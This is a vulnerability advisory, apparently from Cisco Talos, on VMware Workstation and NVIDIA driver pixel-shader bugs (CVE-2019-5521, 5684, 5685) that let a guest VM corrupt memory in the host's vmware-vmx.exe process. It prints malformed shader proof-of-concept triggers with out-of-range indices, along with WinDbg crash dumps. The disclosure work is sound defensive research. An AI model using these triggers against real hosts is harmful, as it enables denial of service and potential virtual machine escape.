1. Executive Summary
Researchers recently discovered an out-of-bounds write vulnerability in VMware ESXi, Workstation and Fusion that can be triggered with a specially crafted shader file. The vulnerability can be triggered from a VMware guest virtual machine and affects the VMware host, crashing the vmware-vmx.exe process on the host (denial of service). It has been assigned CVE-2019-5521.
However, because of an additional security issue in NVIDIA's Windows GPU display driver, when the host/guest system uses an NVIDIA graphics card this VMware denial-of-service vulnerability can be turned into a code execution vulnerability (CVE-2019-5684), resulting in a virtual machine escape.
In addition, two out-of-bounds write vulnerabilities (CVE-2019-5685) that could lead to arbitrary code execution were found in the NVIDIA Windows GPU display driver; they can likewise be triggered with a specially crafted shader file.
In accordance with our coordinated disclosure policy, Cisco Talos worked with NVIDIA and VMware to ensure these vulnerabilities were fixed and that updates are available for affected customers.
2. VMware Workstation 15 Pixel Shader Functionality Denial-of-Service Vulnerability (CVE-2019-5521)
2.1 Summary
An exploitable denial-of-service vulnerability exists in VMware Workstation 15. A specially crafted pixel shader can cause a denial of service. An attacker can trigger this vulnerability with a specially crafted shader file, causing vmware-vmx.exe on the host to crash.
2.2 Tested Versions
VMware Workstation 15 (15.0.2 build-10952284) with Windows 10 x64 as the guest VM
2.3 CVSSv3 Score
6.5 – CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
2.4 CWE
CWE-125: Out-of-bounds Read
2.5 Details
This vulnerability can be triggered from inside the VMware guest operating system by supplying a malformed pixel shader. An attacker can trigger it from VMware guest user mode, causing a denial of service of the vmware-vmx.exe process on the host through an out-of-bounds read; the same read could also lead to information disclosure. The attack could theoretically also be carried out via WebGL (a remote website).
The malformed pixel shader looks as follows:
(VMware debug mode)
2018-12-26T09:31:59.472+01:00| svga| W115: --- input ---
2018-12-26T09:31:59.472+01:00| svga| W115+ ps_4_0
2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_SAMPLER SAMPLER[0], DEFAULT
2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_RESOURCE RESOURCE[0], TEXTURE2D, {FLOAT, FLOAT, FLOAT, FLOAT}
2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_INPUT_PS INPUT[1].xy, LINEAR
2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_OUTPUT OUTPUT[0].xyzw
2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_TEMPS 1
2018-12-26T09:31:59.472+01:00| svga| W115+ SAMPLE TEMP[0].xyzw, INPUT[1].xyxx, RESOURCE[26112].xyzw, SAMPLER[0]
2018-12-26T09:31:59.472+01:00| svga| W115+ MOV OUTPUT[0].xyzw, TEMP[0].xyzw
2018-12-26T09:31:59.472+01:00| svga| W115+ RET
2018-12-26T09:31:59.472+01:00| svga| W115+
2018-12-26T09:31:59.472+01:00| svga| E105: PANIC: ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:3267
2018-12-26T09:31:59.472+01:00| svga| W115: Win32 object usage: GDI 7, USER 24
2018-12-26T09:31:59.472+01:00| svga| I125: CoreDump_CoreDump: faking exception to get context
2018-12-26T09:31:59.473+01:00| svga| I125: CoreDump: Minidump file vmware-vmx-debug.dmp exists. Rotating ...
Modifying the shader instructions (the shader bytecode) can cause a denial of service of the vmware-vmx.exe process, for example by changing "SAMPLE TEMP[0].xyzw, INPUT[1].xyxx, RESOURCE[0].xyzw, SAMPLER[0]" to "SAMPLE TEMP[0].xyzw, INPUT[1].xyxx, RESOURCE[26112].xyzw, SAMPLER[0]".
As the shader instruction dump shows, the shader has been modified and the array index of "RESOURCE" has been changed to 26112. This is what leads to the vulnerability: only RESOURCE[0] appears in the resource declarations, so RESOURCE[26112] is invalid. The result is a read access violation, shown below. Furthermore, by changing the value of this array index, an attacker can steer the read to different addresses and cause out-of-bounds reads.
(VMware release mode crash dump fragment)
0:012> .ecxr
rax=00000001fffff000 rbx=00007ff7eb952420 rcx=5de0fa8b8cd20000
rdx=0000000000000000 rsi=000000000ebe67e8 rdi=000000000f75ab20
rip=00007ff7eb95263d rsp=000000000ebe47f0 rbp=000000000ebe48f0
 r8=0000000000000000  r9=0000000000000000 r10=00000000fffff800
r11=000000000ebe3710 r12=0000000000000000 r13=000000000ebe6910
r14=0000000000000000 r15=000000000ebe64a0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Unable to load image C:\Program Files (x86)\VMware\VMware Workstation\x64\vmware-vmx.exe, Win32 error 0n2
*** WARNING: Unable to verify timestamp for vmware-vmx.exe
*** ERROR: Module load completed but symbols could not be loaded for vmware-vmx.exe
vmware_vmx+0x35263d:
00007ff7`eb95263d 4c8b1cc7        mov     r11,qword ptr [rdi+rax*8] ds:00000010`0f752b20=????????????????
2.6 Timeline
2019-01-14: Vulnerability disclosed to vendors
2019-04-08: NVIDIA and VMware begin coordinated discussions
2019-05-23: Disclosure deadline extended
2019-08-02: Vendors release patches; public release of the vulnerability details
2.7 Credit
Discovered by Piotr Bania of Cisco Talos.
3. NVIDIA NVWGF2UMX_CFG.DLL Shader Functionality Code Execution Vulnerability (CVE-2019-5684)
3.1 Summary
An exploitable untrusted pointer dereference vulnerability exists in versions 24.21.14.1216 and 412.16 of the NVIDIA NVWGF2UMX_CFG driver. The vulnerability can be triggered from a VMware guest virtual machine and affects the VMware host.
3.2 Tested Versions
NVWGF2UMX_CFG.DLL (version 24.21.14.1216), NVIDIA D3D10 driver version 412.16, NVIDIA Quadro K620, VMware Workstation 15 (15.0.2 build-10952284) with Windows 10 x64 as the guest VM.
3.3 CVSSv3 Score
9.0 – CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
3.4 CWE
CWE-822: Untrusted Pointer Dereference
3.5 Details
This vulnerability can be triggered from inside the VMware guest operating system by supplying a malformed pixel shader. The attack can be launched from VMware guest user mode, causing an untrusted pointer dereference in the vmware-vmx.exe process on the host, which can result in memory corruption. The attack could theoretically also be carried out via WebGL (a remote website).
The malformed pixel shader looks as follows:
(VMware debug mode)
ps_4_1
DCL_INPUT_PS INPUT[1].xy, LINEAR
DCL_OUTPUT OUTPUT[0].xy
DCL_TEMPS 3
DCL_RESOURCE RESOURCE[5], TEXTURE2DARRAY, {FLOAT, FLOAT, FLOAT, FLOAT}
DCL_SAMPLER SAMPLER[5], DEFAULT
MOV TEMP[0].xy, INPUT[1].xyxx
MOV TEMP[0].z, {0, 0, 0, 0}
SAMPLE_AOFFIMMI(-1, 0, 0) TEMP[1].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5]
SAMPLE TEMP[2].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5]
SAMPLE_AOFFIMMI(1, 0, 0) TEMP[0].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5]
ADD TEMP[0].zw, TEMP[1].xxxy, TEMP[2].xxxy
ADD TEMP[0].xy, TEMP[0].xyxx, TEMP[0].zwzz
MUL OUTPUT[0].xy, TEMP[0].xyxx, {0.333333343, 0.333333343, 0, 0}
RET
The DCL_RESOURCE instruction declares a non-multisampled shader input resource; its first operand is the texture register, where N is the integer register number.
By modifying the shader instructions (the shader bytecode), specifically changing the texture-register operand of the SAMPLE instruction from the previously declared RESOURCE[5] to a different RESOURCE[X] (X = 46 in this example), an arbitrary memory write, i.e. an untrusted pointer dereference, can be triggered.
(VMware release mode crash dump fragment)
0:015> .ecxr
rax=0000021100000000 rbx=000002110bc25568 rcx=0000000000000000
rdx=00000000ffffffff rsi=00007ffb42380074 rdi=000002110bc38c80
rip=00007ffb41344e80 rsp=00000046008fa610 rbp=0000000000000068
 r8=0000000000000000  r9=000002110bc25568 r10=00007ffb4110a2c0
r11=000002110bc371d0 r12=00000210f9f1ac60 r13=00000210f9f1b1e0
r14=000002110bc25568 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
nvwgf2umx_cfg!OpenAdapter12+0x677290:
00007ffb`41344e80 89486c          mov     dword ptr [rax+6Ch],ecx ds:00000211`0000006c=????????
Stack trace:
0:015> kb
  *** Stack trace for last set context - .thread/.cxr resets it
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffb`410af212 : 00007ffb`41225940 00007ffb`41225940 00007ffb`4238005c 00000211`0bc38cb0 : nvwgf2umx_cfg!OpenAdapter12+0x677290
01 00007ffb`410af2af : 00000211`0bc1a428 00000046`008fb7c0 00000211`0bc1a428 00000211`0bc25568 : nvwgf2umx_cfg!OpenAdapter12+0x3e1622
02 00007ffb`4104f9d2 : 00000211`0bc25568 00000046`008fb7c0 00000211`0bc1a428 00000046`008fb7b8 : nvwgf2umx_cfg!OpenAdapter12+0x3e16bf
03 00007ffb`40faa8f6 : 00000210`fa216140 00000000`00000001 0000020f`70677478 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x381de2
04 00007ffb`40ed7414 : 00000000`00000001 00000000`00000001 00000210`fa4b1440 00000210`fa4b1070 : nvwgf2umx_cfg!OpenAdapter12+0x2dcd06
05 00007ffb`40edda72 : 00000000`00000000 00000210`fa4b1440 00000000`00000000 a4c7a90a`b7ff407f : nvwgf2umx_cfg!OpenAdapter12+0x209824
06 00007ffb`41a7fd4b : 00000210`fa4b1070 00000000`00000000 00000210`fa4b1440 00000210`f9952f40 : nvwgf2umx_cfg!OpenAdapter12+0x20fe82
07 00007ffb`41a1813a : 00000000`80004005 0000020f`70677460 00000000`80004005 00000210`f9952f40 : nvwgf2umx_cfg!NVAPI_Thunk+0x4019bb
08 00007ffb`40ed4509 : 00000000`00000030 00007ffb`41a17fc0 00000210`fa3d19c0 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x399daa
09 00007ffb`40ce206b : 00000000`00000000 00000046`008fbcd1 00007ffb`4192e190 00000046`008f0000 : nvwgf2umx_cfg!OpenAdapter12+0x206919
0a 00007ffb`40ed562e : 00000210`fa23ae60 00000210`fa23ae80 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x1447b
0b 00007ffb`41a9fc11 : 00000000`00000000 00000210`fa1fd988 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x207a3e
0c 00007ffb`41a9a1b7 : 00000000`00000000 00000000`00000000 00000210`f9952f40 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x421881
0d 00007ffb`48eeb11d : 00000000`00000000 00000210`fa1fd978 00000210`f9949050 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x41be27
0e 00007ffb`48ee4eab : 00000211`0bc0df58 00000210`f9949050 00000210`fa1fd978 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219
0f 00007ffb`48ee4dc3 : 00000046`008fe170 00007ffb`490c3b10 00000210`fa1fd820 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
10 00007ffb`48ef7665 : 00000210`fa1fd870 00000046`008fe170 00000046`008fe1a0 00007ffb`490c3b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b
11 00007ffb`48efcac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975
12 00007ffb`48efd3c0 : 00000210`fa1fd820 00000211`0bbeb4e8 00007ffb`490c30e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266
13 00007ffb`48edca83 : 00000210`f99ec980 00000210`00000009 00000210`f99ed1b8 00007ffb`48edaa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
14 00007ffb`48eda976 : 00000211`0bc0dec0 00000000`0000b000 00000046`008fe599 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f
15 00007ffb`48eda768 : 00000210`f99ed1b8 00000211`0bc0dec0 00000000`000001e8 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202
16 00007ff7`6ac48522 : 00000210`fa5bd090 00007ff7`6a990000 00007ff7`6a990000 0000020f`72000600 : d3d11!CDevice::CreatePixelShader+0x28
17 00007ff7`6ac49e05 : 00000210`fa5bd090 00007ff7`6a990000 00007ff7`6a990000 00000046`008fe630 : vmware_vmx+0x2b8522
18 00007ff7`6ac48c82 : 00000210`fa5c5010 00007ff7`6a990000 00000210`fa5bd090 00000210`fa5bd090 : vmware_vmx+0x2b9e05
19 00007ff7`6ac45171 : 00000000`fffff700 00000210`fa5bd090 00000000`00000004 00000210`fa1f5fa0 : vmware_vmx+0x2b8c82
1a 00007ff7`6ab9ee09 : 00007ff7`6ab9ed40 00000210`fa1f5f90 00000000`000044e8 00007ff7`6ac83960 : vmware_vmx+0x2b5171
1b 00007ff7`6ab32bc2 : 00000000`00000000 00007ff7`6ab9ed40 00000046`008ff840 00000000`000044e8 : vmware_vmx+0x20ee09
1c 00007ff7`6ab30c6f : 00000046`008ff960 00000000`00000000 00000000`00000000 00000000`00000002 : vmware_vmx+0x1a2bc2
1d 00007ff7`6aa86830 : 0000020f`720006e0 0000020f`720006e0 00000000`00000000 00000000`00000008 : vmware_vmx+0x1a0c6f
1e 00007ff7`6afab6d0 : 00007ff7`6aa86710 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf6830
1f 00007ffb`4cdd7e94 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61b6d0
20 00007ffb`4fbfa251 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
21 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
3.6 Timeline
2019-01-14: Vulnerability disclosed to vendors
2019-04-08: NVIDIA and VMware begin coordinated discussions
2019-05-23: Disclosure deadline extended
2019-08-02: Vendors release patches; public release of the vulnerability details
3.7 Credit
Discovered by Piotr Bania of Cisco Talos.
4. NVIDIA NVWGF2UMX_CFG.DLL Shader Functionality DCL_INDEXABLETEMP Code Execution Vulnerability (CVE-2019-5685)
4.1 Summary
An exploitable memory corruption vulnerability exists in versions 25.21.14.2531 and 425.31 of the NVIDIA NVWGF2UMX_CFG driver. A specially crafted pixel shader can cause an out-of-bounds memory write. An attacker can trigger this vulnerability with a specially crafted shader file. It can be triggered from a VMware guest virtual machine and affects the VMware host.
4.2 Tested Versions
NVWGF2UMX_CFG.DLL (version 25.21.14.2531), NVIDIA D3D10 driver (version 425.31), NVIDIA Quadro K620, VMware Workstation 15 (15.0.4 build-12990004) with Windows 10 x64 as the guest VM.
4.3 CVSSv3 Score
9.0 – CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
4.4 CWE
CWE-787: Out-of-bounds Write
4.5 Details
This vulnerability can be triggered from inside the VMware guest virtual machine's operating system by supplying a malformed pixel shader to the NVIDIA NVWGF2UMX_CFG.DLL driver. The attack can be launched from VMware guest user mode, causing memory corruption in the vmware-vmx.exe process on the host; it could also be carried out via WebGL (a remote website).
An example of the malformed pixel shader:
ps_4_0
dcl_constantbuffer cb0[2], immediateIndexed
dcl_indexableTemp x1[3], 4
dcl_indexableTemp x2[3], 4
dcl_indexableTemp x3[3], 4
dcl_indexableTemp x4[3], 4
dcl_indexableTemp x5[3], 4
dcl_indexableTemp x6[3], 4
...
mov x1[1].y, l(0.900447,0.900447,0.900447,0.900447)
mov x1[1].z, l(-0.434966,-0.434966,-0.434966,-0.434966)
mov x1[2].x, l(0,0,0,0)
mov x1[2].y, l(0.434966,0.434966,0.434966,0.434966)
mov x1[2].z, l(0.900447,0.900447,0.900447,0.900447)
mov x2[52278].xyzw, x1[0].xyzz
mov x2[1].xyzw, x1[1].xyzz
mov x2[2].xyzw, x1[2].xyzz
mov x3[0].x, l(0.900447,0.900447,0.900447,0.900447)
...
DCL_INDEXABLETEMP declares an indexable temporary register. In the example, the number of elements in the register array (x2) is 3 and the number of components per register is 4.
By modifying the shader bytecode of the MOV X2[X] instruction, specifically changing the array index to a value larger than the previously declared size, an out-of-bounds memory write can be triggered in NVIDIA's NVWGF2UMX_CFG.DLL driver. The bug is caused by an incorrect computation of the destination memory address (the R9 register, shown below) inside the NVWGF2UMX_CFG.DLL driver.
(VMware release mode crash dump fragment)
0:015> .ecxr
rax=0000000000000000 rbx=0000025a57f0c2e0 rcx=0000000000000000
rdx=0000000000000001 rsi=0000000000000001 rdi=0000000000000000
rip=00007ffdca904540 rsp=000000c723cfb630 rbp=000000c723cfb730
 r8=0000000000000000  r9=0000029a5832e6b0 r10=000000000000000f
r11=00000000000000a4 r12=0000000000040300 r13=0000000000000001
r14=0000025a580f12a0 r15=0000025a583bd870
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x17aea0:
00007ffd`ca904540 410f1101        movups  xmmword ptr [r9],xmm0 ds:0000029a`5832e6b0=????????????????????????????????
Stack trace:
0:015> kb
  *** Stack trace for last set context - .thread/.cxr resets it
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffd`ca79dfb1 : 0000025a`580f12a0 00007ffd`cb315bc0 0000025a`580f12a0 0000025a`5772f0c0 : nvwgf2umx_cfg!OpenAdapter12+0x17aea0
01 00007ffd`ca79e7a8 : 00007ffd`ca7870b0 0000025a`57e076c0 00007ffd`ca7870b0 0000025a`57b12140 : nvwgf2umx_cfg!OpenAdapter12+0x14911
02 00007ffd`ca79f906 : 0000025a`57fe83c8 000000c7`23cfb9d9 00000000`fd0000fd 00007ffd`d936d997 : nvwgf2umx_cfg!OpenAdapter12+0x15108
03 00007ffd`ca99a9d9 : 0000025a`57fe83c8 0000025a`5773d480 000000c7`23cfbce0 00000000`00000110 : nvwgf2umx_cfg!OpenAdapter12+0x16266
04 00007ffd`cb4c0d61 : 0000025a`00000000 00000000`00000cf0 0000025a`57fe83c8 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x211339
05 00007ffd`cb4baaa7 : 0000025a`57fe83c8 00000000`00000000 0000025a`5770c6a0 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x347461
06 00007ffd`d279b11d : 00000000`00000000 000000c7`23cfc4c0 0000025a`57fe83b8 0000025a`577000b0 : nvwgf2umx_cfg!NVAPI_Thunk+0x3411a7
07 00007ffd`d2794eab : 0000025a`5842cfdc 0000025a`577000b0 0000025a`57fe83b8 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219
08 00007ffd`d2794dc3 : 000000c7`23cfe030 00007ffd`d2973b10 0000025a`57fe8250 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
09 00007ffd`d27a7665 : 0000025a`57fe82b0 000000c7`23cfe030 000000c7`23cfe060 00007ffd`d2973b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b
0a 00007ffd`d27acac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975
0b 00007ffd`d27ad3c0 : 0000025a`57fe8250 00000258`d12418c8 00007ffd`d29730e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266
0c 00007ffd`d278ca83 : 00000258`d10016b0 00000258`00000009 00000258`d1001ee8 00007ffd`d278aa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0d 00007ffd`d278a976 : 0000025a`5842cf40 00000000`0000b000 000000c7`23cfe459 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f
0e 00007ffd`d278a768 : 00000258`d1001ee8 0000025a`5842cf40 00000000`00000d4c 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202
0f 00007ff7`33968802 : 0000025a`5812c050 00007ff7`336b0000 00007ff7`336b0000 00000258`d05f0600 : d3d11!CDevice::CreatePixelShader+0x28
10 00007ff7`3396a0e5 : 0000025a`5812c050 00007ff7`336b0000 00007ff7`336b0000 00000258`d1001708 : vmware_vmx+0x2b8802
11 00007ff7`33968f62 : 0000025a`58133fd0 00007ff7`336b0000 0000025a`5812c050 0000025a`5812c050 : vmware_vmx+0x2ba0e5
12 00007ff7`33965451 : 00000000`fffe4000 0000025a`5812c050 00000000`00000003 0000025a`584c3f70 : vmware_vmx+0x2b8f62
13 00007ff7`338beec9 : 00007ff7`338bee00 0000025a`584c3f60 00000000`00000028 00007ff7`339a3e50 : vmware_vmx+0x2b5451
14 00007ff7`338529d2 : 00000000`00000040 00007ff7`338bee00 000000c7`23cff700 00000000`00000028 : vmware_vmx+0x20eec9
15 00007ff7`33850a9f : 000000c7`23cff820 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a29d2
16 00007ff7`337a65a0 : 00000258`d05f0600 00000258`d05f06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0a9f
17 00007ff7`33ccc7b0 : 00007ff7`337a6480 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65a0
18 00007ffd`d6bc7974 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c7b0
19 00007ffd`d93ca271 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
1a 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
4.6 Timeline
2019-04-29: Vulnerability disclosed to vendors
2019-08-02: Vendors release patches; public release of the vulnerability details
4.7 Credit
Discovered by Piotr Bania of Cisco Talos.
5. NVIDIA NVWGF2UMX_CFG.DLL Shader Functionality DCL_INDEXABLETEMP Code Execution Vulnerability (CVE-2019-5685)
5.1 Overview
An exploitable memory corruption vulnerability exists in versions 25.21.14.2531 and 425.31 of the NVIDIA NVWGF2UMX_CFG driver. A specially crafted pixel shader can cause an untrusted pointer dereference. An attacker can trigger this vulnerability with a specially crafted shader file. It can be triggered from a VMware guest virtual machine and affects the VMware host.
5.2 Tested Versions
NVWGF2UMX_CFG.DLL (version 25.21.14.2531), NVIDIA D3D10 driver version 425.31, NVIDIA Quadro K620, VMware Workstation 15 (15.0.2 build-12990004) with Windows 10 x64 as the guest VM.
5.3 CVSSv3 Score
9.0 – CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
5.4 CWE
CWE-822: Untrusted Pointer Dereference
5.5 Details
This vulnerability can be triggered from inside the VMware guest virtual machine's operating system by supplying a malformed pixel shader to the NVIDIA NVWGF2UMX_CFG.DLL driver. The attack can be launched from VMware guest user mode, causing an untrusted pointer dereference in the vmware-vmx.exe process on the host, which can result in memory corruption; theoretically it could also be carried out via WebGL (a remote website).
An example of the malformed pixel shader:
ps_4_0
dcl_constantbuffer cb0[3], immediateIndexed
dcl_indexableTemp x1[65], 4
mov r17.xyz, v0.xyzw
div r17.w, l(1.000000, 1.000000, 1.000000, 1.000000), v0.xyzw
mov r0.xyzw, r17.xyzw
mad r0.y, r17.xyzw, cb0[2].xxxx, cb0[2].yyyy
mov x1[0].x, l(0,0,0,0)
mov x1[1].x, l(1,1,1,1)
mov x1[2].x, l(1,1,1,1)
mov x1[3].x, l(1,1,1,1)
mov x1[4].x, l(0,0,0,0)
mov x1[5].x, l(0,0,0,0)
mov x1[6].x, l(1,1,1,1)
mov x1[7].x, l(0,0,0,0)
mov x1[8].x, l(0,0,0,0)
mov x1[9].x, l(1,1,1,1)
mov x1[10].x, l(0,0,0,0)
mov x1[11].x, l(1,1,1,1)
mov x1[12].x, l(0,0,0,0)
mov x1[13].x, l(0,0,0,0)
mov x1[14].x, l(1,1,1,1)
mov x1[39385].x, l(0,0,0,0)
...
DCL_INDEXABLETEMP declares an indexable temporary register. In the example, the number of elements in the register array (x1) is 65 and the number of components per register is 4.
By modifying the shader bytecode of the MOV X1[X] instruction, specifically changing the array index to a value larger than 65, an untrusted pointer dereference can be caused in NVIDIA's NVWGF2UMX_CFG.DLL driver.
(VMware release mode crash dump fragment)
0:015> .ecxr
rax=0000000000000000 rbx=0000021fa6627bc0 rcx=0000025fa668a150
rdx=0000000000000002 rsi=0000000000000000 rdi=0000021fa6625600
rip=00007ffdca904d0b rsp=0000001f15efb740 rbp=0000001f15efb840
 r8=00007ffdca610000  r9=000000003fea6842 r10=00000000000000e4
r11=0000000000000084 r12=0000000000040300 r13=0000000000000001
r14=0000021fa677d920 r15=0000021fa67e3910
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x17b66b:
00007ffd`ca904d0b 488901          mov     qword ptr [rcx],rax ds:0000025f`a668a150=????????????????
Stack trace:
0:015> kb
  *** Stack trace for last set context - .thread/.cxr resets it
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffd`ca79dfb1 : 0000021f`a677d920 00007ffd`cb315bc0 0000021f`a677d920 0000021f`a5fe98c0 : nvwgf2umx_cfg!OpenAdapter12+0x17b66b
01 00007ffd`ca79e7a8 : 00007ffd`ca7870b0 0000021f`a63ad330 00007ffd`ca7870b0 0000021f`a656ded0 : nvwgf2umx_cfg!OpenAdapter12+0x14911
02 00007ffd`ca79f906 : 0000021f`a62af948 0000001f`15efbae9 00000000`84000185 00007ffd`d936d997 : nvwgf2umx_cfg!OpenAdapter12+0x15108
03 00007ffd`ca99a9d9 : 0000021f`a62af948 0000021f`a5ff7c80 0000001f`15efbdf0 00000000`00000110 : nvwgf2umx_cfg!OpenAdapter12+0x16266
04 00007ffd`cb4c0d61 : 0000021f`00000000 00000000`000013c8 0000021f`a62af948 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x211339
05 00007ffd`cb4baaa7 : 0000021f`a62af948 00000000`00000000 0000021f`a5e1a260 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x347461
06 00007ffd`d279b11d : 00000000`00000000 0000001f`15efc5d0 0000021f`a62af938 0000021f`a5e0dc70 : nvwgf2umx_cfg!NVAPI_Thunk+0x3411a7
07 00007ffd`d2794eab : 0000021f`a67cf96c 0000021f`a5e0dc70 0000021f`a62af938 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219
08 00007ffd`d2794dc3 : 0000001f`15efe140 00007ffd`d2973b10 0000021f`a62af7e0 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
09 00007ffd`d27a7665 : 0000021f`a62af830 0000001f`15efe140 0000001f`15efe170 00007ffd`d2973b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b
0a 00007ffd`d27acac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975
0b 00007ffd`d27ad3c0 : 0000021f`a62af7e0 0000021f`a64e3f28 00007ffd`d29730e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266
0c 00007ffd`d278ca83 : 0000021f`a5fc65d0 0000021f`00000009 0000021f`a5fc6e08 00007ffd`d278aa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0d 00007ffd`d278a976 : 0000021f`a67cf8d0 00000000`0000b000 0000001f`15efe569 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f
0e 00007ffd`d278a768 : 0000021f`a5fc6e08 0000021f`a67cf8d0 00000000`00001424 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202
0f 00007ff7`33968802 : 0000021f`a67c5060 00007ff7`336b0000 00007ff7`336b0000 0000021e`203e0600 : d3d11!CDevice::CreatePixelShader+0x28
10 00007ff7`3396a0e5 : 0000021f`a67c5060 00007ff7`336b0000 00007ff7`336b0000 0000021f`a5fc6628 : vmware_vmx+0x2b8802
11 00007ff7`33968f62 : 0000021f`a67ccfe0 00007ff7`336b0000 0000021f`a67c5060 0000021f`a67c5060 : vmware_vmx+0x2ba0e5
12 00007ff7`33965451 : 00000000`fffe4000 0000021f`a67c5060 00000000`00000003 0000021f`a667a4d0 : vmware_vmx+0x2b8f62
13 00007ff7`338beec9 : 00007ff7`338bee00 0000021f`a667a4c0 00000000`00000028 00007ff7`339a3e50 : vmware_vmx+0x2b5451
14 00007ff7`338529d2 : 00000000`00000040 00007ff7`338bee00 0000001f`15eff810 00000000`00000028 : vmware_vmx+0x20eec9
15 00007ff7`33850a9f : 0000001f`15eff930 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a29d2
16 00007ff7`337a65a0 : 0000021e`203e0600 0000021e`203e06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0a9f
17 00007ff7`33ccc7b0 : 00007ff7`337a6480 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65a0
18 00007ffd`d6bc7974 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c7b0
19 00007ffd`d93ca271 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
1a 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
